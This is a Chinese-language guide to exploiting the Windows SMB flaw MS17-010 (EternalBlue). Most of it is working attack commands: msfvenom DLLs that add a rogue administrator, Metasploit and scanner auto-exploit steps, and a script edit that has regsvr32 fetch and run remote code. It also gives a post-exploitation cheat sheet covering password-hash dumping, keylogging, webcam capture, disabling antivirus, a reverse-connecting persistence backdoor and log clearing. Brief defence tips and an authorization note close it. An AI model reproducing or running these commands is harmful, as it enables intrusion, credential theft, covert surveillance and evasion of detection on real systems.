内网渗透之MS17-010（永恒之蓝）漏洞利用完全指南

一、漏洞简介

永恒之蓝（MS17-010）是2017年4月14日由黑客团体Shadow Brokers公布的Windows系统SMB协议漏洞利用工具，该漏洞允许攻击者通过TCP的445和139端口远程执行代码，获取系统最高权限。

漏洞原理

• 利用SMBv1和NBT中的远程代码执行漏洞
• 通过恶意代码扫描并攻击开放445文件共享端口的Windows主机
• 攻击成功后可在目标主机植入勒索病毒、窃取隐私或安装远程控制木马

受影响版本

• Windows NT
• Windows 2000
• Windows XP
• Windows 2003
• Windows Vista
• Windows 7
• Windows 8
• Windows 2008
• Windows 2008 R2
• Windows Server 2012 SP0

二、环境准备

攻击机

• Linux Kali (IP示例: 192.168.x.165)

靶机

• Windows 7 (IP示例: 192.168.x.166)

三、漏洞利用方法

方法1：使用ABC_123图形化工具

1. 生成DLL文件

msfvenom -p windows/x64/exec CMD='cmd.exe /k "net user admin01 Config123!@# /add && net localgroup administrators admin01 /add"' EXITFUNC=none -f dll > /tmp/x64.dll
msfvenom -p windows/exec CMD='cmd.exe /k "net user admin01 Config123!@# /add && net localgroup administrators admin01 /add"' EXITFUNC=none -f dll > /tmp/x86.dll

2. 将生成的x86.dll和x64.dll放入工具根目录
3. 运行图形化界面工具
4. 设置目标IP并执行攻击
5. 成功添加管理员用户admin01

方法2：使用原版方程式工具

1. 下载原版方程式工具包
2. 准备DLL文件（同方法1）
3. 按照工具说明配置参数
4. 执行攻击并添加用户

方法3：使用Metasploit Framework

1. 启动msfconsole
2. 搜索并选择MS17-010模块

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue

3. 设置目标参数

set RHOSTS 192.168.x.166
set RPORT 445

4. 执行攻击

exploit

5. 提权并添加用户

net user adam adamd2 /add
net localgroup Administrators adam /add

方法4：使用Ladon工具

1. 漏洞检测（无损）

Ladon 192.168.1.8 MS17010
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/c MS17010

2. 独立使用（自动利用）

Ladon 192.168.1.8 MS17010_EXP

方法5：使用fscan扫描工具

fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add

方法6：使用zzz_exploit.py脚本

1. 从GitHub获取脚本：https://github.com/worawit/MS17-010
2. 关键要求：
   • 需要有效的SMB账户（可通过爆破获取）
   • 需要指定管道名（常见管道名见下文）
3. 修改payload部分（默认创建C:\pwned.txt）

def smb_pwn(conn, arch):
    service_exec(conn, r'cmd /c regsvr32 /s /n /u /i:http://x.x.x.x/test.sct scrobj.dll')

常见管道名：
netlogon, lsarpc, samr, browser, atsvc, DAV RPC SERVICE, epmapper, eventlog, InitShutdown, keysvc, lsass, LSM_API_service, ntsvcs, plugplay, protected_storage, router, SapiServerPipeS-1-5-5-0-70123, scerpc, srvsvc, tapsrv, trkwks, W32TIME_ALT, wkssvc, PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER, db2remotecmd

四、后渗透阶段（Metasploit）

基本操作

shell          # 进入Windows shell
exit           # 从shell返回meterpreter
background     # 从meterpreter返回MSF
sessions -l    # 查看获得的shell
sessions -i 1  # 切换到ID为1的shell

信息收集

sysinfo        # 查看系统信息
run scraper    # 查看详细系统信息
run hashdump   # 导出密码哈希
load kiwi      # 加载kiwi模块
ps             # 查看进程
pwd            # 查看当前目录(Windows)
getlwd         # 查看当前目录(Linux)
search -f *.jsp -d e:\  # 搜索E盘中所有.jsp文件

文件操作

download e:\test.txt /root  # 下载文件
upload /root/test.txt d:\test  # 上传文件

权限提升

getpid        # 查看当前进程PID
migrate 1384  # 迁移到PID为1384的进程
getuid        # 查看当前权限
getsystem     # 提权
run killav    # 关闭杀毒软件

远程控制

screenshot      # 截图
webcam_list     # 查看摄像头
webcam_snap     # 拍照
webcam_stream   # 开启视频
execute -f 可执行文件  # 执行程序
run getgui -u hack -p 123  # 创建用户
run getgui -e    # 开启远程桌面

键盘记录

keyscan_start   # 开始记录
keyscan_dump    # 显示记录
keyscan_stop    # 停止记录
uictl disable keyboard  # 禁用键盘
uictl enable keyboard   # 启用键盘
uictl disable mouse     # 禁用鼠标
uictl enable mouse      # 启用鼠标

持久化后门

run persistence -X -i 5 -p 8888 -r 192.168.10.27  # 自动反弹
portfwd add -l 3389 -r 192.168.11.13 -p 3389  # 端口转发
clearev  # 清除日志

其他有用模块

run post/windows/manage/migrate  # 自动进程迁移
run post/windows/gather/checkvm  # 检查虚拟机
run post/windows/manage/killav   # 关闭杀毒软件
run post/windows/manage/enable_rdp  # 开启远程桌面
run post/windows/manage/autoroute  # 查看路由
run post/windows/gather/enum_logged_on_users  # 列举登录用户
run post/windows/gather/enum_applications  # 列举应用程序
run windows/gather/credentials/windows_autologin  # 抓取自动登录凭证
run windows/gather/smart_hashdump  # dump所有用户hash

五、防御建议

1. 及时安装MS17-010补丁
2. 关闭SMBv1协议
3. 禁用445和139端口的外部访问
4. 部署入侵检测系统监控异常SMB流量
5. 定期进行安全审计和漏洞扫描

六、注意事项

1. 该漏洞利用工具通常会被杀毒软件检测
2. 在实际渗透测试前必须获得合法授权
3. 漏洞利用可能导致目标系统不稳定或崩溃
4. 建议在测试环境中充分验证后再应用于实际环境